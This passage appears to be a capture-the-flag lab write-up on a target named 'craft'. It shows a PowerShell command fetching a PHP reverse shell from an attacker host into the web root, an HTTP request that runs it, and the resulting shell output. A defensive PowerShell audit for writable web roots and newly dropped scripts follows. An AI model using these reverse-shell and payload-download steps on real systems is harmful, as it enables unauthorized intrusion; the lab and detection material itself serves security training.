apache


The current user, thecybergeek, has write access to the web root directory, C:\xampp\htdocs.

PS C:\xampp\htdocs> iwr -Uri http://192.168.45.197/shell.php -Outfile C:\xampp\htdocs\shell.php

Transferring the PHP reverse shell payload into the web root.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft]
└─$ curl http://craft.offsec/shell.php

Invoking the payload by requesting it over HTTP.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft]
└─$ nnc 6666
listening on [any] 6666 ...
connect to [192.168.45.197] from (UNKNOWN) [192.168.138.169] 50133
SOCKET: Shell has connected! PID: 1736
Microsoft Windows [Version 10.0.17763.2029]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\xampp\htdocs> whoami
craft\apache
 
C:\xampp\htdocs> hostname
CRAFT
 
C:\xampp\htdocs> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::2cf0:b138:c2e1:e87b%5
   IPv4 Address. . . . . . . . . . . : 192.168.138.169
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.138.254

Lateral movement to the apache account was achieved by writing a PHP reverse shell to the web root directory and requesting it through the web server, which executed it as craft\apache.
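From the defender's side, the root cause above is a web root that an interactive user can write to. The following is an added example, not part of the original notes: a PowerShell audit that lists non-administrative principals able to create files in the web root and reports recently created script files with their owner. The function names, the trusted-principal list, the extension list and the 7-day window are assumptions to adjust.

```powershell
# Added example: audit a web root for unexpected writers and new script files.
# Get-WebRootWriters / Get-RecentWebScripts are hypothetical helper names.
function Get-WebRootWriters {
    param(
        [string]$WebRoot = 'C:\xampp\htdocs',
        # Assumed allow-list of principals expected to hold write access.
        [string[]]$Trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                               'NT SERVICE\TrustedInstaller')
    )
    $fsr = [System.Security.AccessControl.FileSystemRights]
    # Create/append bits, plus GENERIC_WRITE and GENERIC_ALL, which some
    # ACEs carry instead of the file-specific rights.
    $writeMask = [int]$fsr::WriteData -bor [int]$fsr::AppendData -bor
                 0x40000000 -bor 0x10000000
    foreach ($ace in (Get-Acl -LiteralPath $WebRoot).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($Trusted -contains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $WebRoot
            Identity  = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

function Get-RecentWebScripts {
    param(
        [string]$WebRoot = 'C:\xampp\htdocs',
        [int]$Days = 7,
        [string[]]$Extensions = @('.php', '.phtml', '.phar')
    )
    $cutoff = (Get-Date).AddDays(-$Days)
    Get-ChildItem -LiteralPath $WebRoot -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $Extensions -contains $_.Extension -and $_.CreationTime -ge $cutoff } |
        ForEach-Object {
            # The file owner shows which account dropped the script.
            [pscustomobject]@{
                Path    = $_.FullName
                Created = $_.CreationTime
                Owner   = (Get-Acl -LiteralPath $_.FullName).Owner
            }
        }
}

Get-WebRootWriters   | Format-Table -AutoSize
Get-RecentWebScripts | Format-Table -AutoSize
```

Any identity returned by the first function is a candidate for having its write access removed; a script file owned by an account other than the deployment account is worth triaging.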